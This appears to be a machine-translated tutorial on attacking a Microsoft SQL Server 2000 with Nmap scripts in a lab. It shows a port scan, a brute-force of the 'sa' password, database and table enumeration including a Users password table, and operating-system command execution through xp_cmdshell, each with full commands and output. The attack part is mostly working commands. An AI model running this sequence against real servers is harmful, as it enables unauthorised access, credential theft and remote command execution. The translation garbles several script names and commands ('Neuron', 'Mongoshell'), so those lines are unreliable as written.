Use Nmap Attack Mssql

Nmap was launched in September 1997 and supports Linux, Windows, Solaris, BSD, Mac OS X, and AmigaOS systems. It adopts the GPL license and was initially used to scan open network connection terminals, determining which service runs on those connected terminals is an important software to evaluate the security of the network system and is also one of the tools commonly used by hackers. The new Nmap Version 5.00 significantly improves performance and adds a large number of scripts. For example, Nmap can now log on to Windows and perform a local check (PDF) to detect the notorious Conficker worm. Other main features include: the new Ncat tool for data transmission, redirection and debugging, The Ndiff quick scan and comparison tool, and the advanced GUI and result browser Zenmap.
Just as most tools are used for network security, nmap is also a popular tool for many hackers and hackers (also known as script kids. System Administrators can use nmap to detect unapproved servers in the work environment, but hackers will use nmap to collect network settings of the target computer and plan the attack methods.
Nmap is often confused with the system vulnerability assessment software Nessus. Nmap uses a secret technique to avoid intrusion into the monitoring system, and does not affect the daily operations of the target system as much as possible.

Scnner
Root @ Dis9Team :~ # Nmap 5.5.5.3-sV 5.5.5.3-p1433-vv

Starting Nmap 5.21 (http://nmap.org) at 2012-09-20 PDT
Neuron: Loaded 4 scripts for scanning.
Initiating ARP Ping Scan at 23:32
Scanning 2 hosts [1 port/host]
Completed ARP Ping Scan at, 0.10 s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 23:32
Completed Parallel DNS resolution of 2 hosts. at 23:32, 0.26 s elapsed
Initiating SYN Stealth Scan at 23:32
Scanning 2 hosts [1 port/host]
Discovered open port 1433/tcp on 5.5.5.3
Discovered open port 1433/tcp on 5.5.5.3
Completed SYN Stealth Scan at 23:32, 0.10 s elapsed (2 total ports)
Initiating Service scan at 23:32
Scanning 2 services on 2 hosts
Completed Service scan at, 11.00 s elapsed (2 services on 2 hosts)
Neuron: Script scanning 2 hosts.
Neuron: Script Scanning completed.
Nmap scan report for 5.5.5.3
Host is up (0.00015 s latency ).
Scanned at 23:32:32 PDT for 12 s
PORT STATE SERVICE VERSION
1433/tcp open ms-SQL-s Microsoft SQL Server 2000 8.00.2039; SP4
MAC Address: 00: 0C: 29: 03: 16: F8 (VMware)
Service Info: OS: Windows

Nmap scan report for 5.5.5.3
Host is up (0.00022 s latency ).
Scanned at 23:32:32 PDT for 12 s
PORT STATE SERVICE VERSION
1433/tcp open ms-SQL-s Microsoft SQL Server 2000 8.00.2039; SP4
MAC Address: 00: 0C: 29: 03: 16: F8 (VMware)
Service Info: OS: Windows
1433/tcp open ms-SQL-s Microsoft SQL Server 2000 8.00.2039; SP4

PASSWD
Root @ Dis9Team:/tmp # cd/pen/nmap/share/nmap/scripts/
Root @ Dis9Team:/pen/nmap/share/nmap/scripts # wget http://nmap.org/svn/scripts/ms-sql-brute.nse
The brute-force cracking NAME and PASS are dictionaries in the TMP directory.

1
Root @ Dis9Team:/tmp # nmap-p 1433 -- script ms-SQL-brute -- script-args userdb = name, passdb = pass 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00021 s latency ).
PORT STATE SERVICE
1433/tcp open ms-SQL-s
| Ms-SQL-brute:
| _ Sa: 123456 => Login Success
MAC Address: 00: 0C: 29: 03: 16: F8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

Select
1
Root @ Dis9Team :~ # Nmap-p 1433 -- script ms-SQL-query -- script-args mssql. username = sa, mssql. password = 123456, ms-sql-query.query = "SELECT @ version" 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00021 s latency ).
PORT STATE SERVICE
1433/tcp open ms-SQL-s
| Ms-SQL-query: (Use-script-args = mssql-query.query = '<QUERY>' to change query .)
| SELECT @ version
| Version
| ========
| Microsoft SQL Server 2000-8.00.2039 (Intel X86)
| May 3 2005 23:18:38
| Copyright (c) 1988-2003 Microsoft Corporation
| _ Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
MAC Address: 00: 0C: 29: 03: 16: F8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Root @ Dis9Team :~ #

GET tables
1
Root @ Dis9Team :~ # Nmap-p 1433 -- script ms-SQL-tables -- script-args mssql. username = sa, mssql. password = 123456 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00027 s latency ).
PORT STATE SERVICE
1433/tcp open ms-SQL-s
| Ms-SQL-tables:
| Pen
| Table column type length
| ==================================
| Products id int 4
| Products prodName varchar 50
| Users userId int 4
| Users userName varchar 50
| Users userPass varchar 20
|
| Restrictions
| Output restricted to 2 tables (see mssql-tables.maxtables)
| Output restricted to 5 databases (see mssql-tables.maxdb)
| _ No filter (see mssql-tables.keywords)
MAC Address: 00: 0C: 29: 03: 16: F8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
Root @ Dis9Team :~ #

Mongoshell
1
Root @ Dis9Team :~ # Nmap-p 1433 -- script ms-SQL-xp-plain shell -- script-args mssql. username = sa, mssql. password = 123456, ms-sql-xp-cmdshell.cmd = "ipconfig" 5.5.5.3
Starting Nmap 5.51 (http://nmap.org) at 2012-09-20 PDT
Nmap scan report for 5.5.5.3
Host is up (0.00027 s latency ).
PORT STATE SERVICE
1433/tcp open ms-SQL-s
| Ms-SQL-xp-plain shell: (Use-script-args = mssql-xp-cmdshell.cmd = '<CMD>' to change command .)
| Ipconfig/all
| Output
| ======
|
| Windows IP Configuration
|
| Host Name .....: fuzzexp-f60914c
| Primary Dns Suffix .......:
| Node Type ...... Hybrid
| IP Routing Enabled...: No
| WINS Proxy Enabled...: No
| DNS Suffix Search List...: localdomain
|
| Ethernet adapter, 0 \ xDE \ xA5:
|
| Connection-specific DNS Suffix.: localdomain
| Description ......: Intel (R) PRO/1000 MT Network Connection
| Physical Address ......: 00-0C-29-03-16-F8
| DHCP Enabled...
| Autoconfiguration Enabled...: Yes
| IP Address ......: 5.5.5.3
| Subnet Mask ......: 255.255.255.0
| Default Gateway ......: 5.5.5.2
| DHCP Server ......: 5.5.5.100
| DNS Servers ......: 5.5.5.2
| Primary WINS Server...: 5.5.5.2
| Lease Obtained ......: 2012t9 \ x0821 \ xE5 14:45:11
| Lease Expires ......: 2012t9 \ x0821 \ xE5 15:15:11
| _
MAC Address: 00: 0C: 29: 03: 16: F8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
Root @ Dis9Team :~ # Link: www.2cto.com